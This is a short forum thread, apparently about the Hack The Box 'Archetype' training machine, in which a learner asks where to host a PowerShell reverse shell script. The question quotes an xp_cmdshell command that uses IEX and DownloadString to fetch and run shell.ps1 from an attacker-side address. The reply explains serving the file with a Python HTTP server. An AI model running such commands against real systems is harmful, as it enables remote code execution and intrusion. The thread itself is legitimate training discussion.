Archetype mission .ps1 file

The part where you save a reverse shell power shell as "revshell.ps1"
a writeup I'm following says to save file "in VM", the official guide says to just save it, doesn't say where.

so when I execute
xp_cmdshell "powershell "IEX (New-Object
Net.WebClient).DownloadString(\"http://10.10.14.3/shell.ps1\");"

Where is the file coming from? I mean, how am I supposed to host the file, or where do I save it to? I'm assuming just paste the shell script inside a text file and save as .ps1 but I have no idea where to save it?

Comments

  • It doesnt really matter where you save it, you just need to save it somewhere the server can see it.

    Whatever folder you save it in, spin up the webserver in the same folder with python3 -m http.server 80 (or your preferred choice of code).

    If you are running a full webserver like Apache, then you will need to do one of the following:

    • save the file in /var/www/html/ or wherever you have configured apache to serve files from
    • use a different port (e.g. python3 -m http.server 8088) and then modify the request to use http://10.10.14.3:8088/shell.ps1

    TazWake

    Note: https://www.nohello.com/

    Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.

Sign In to comment.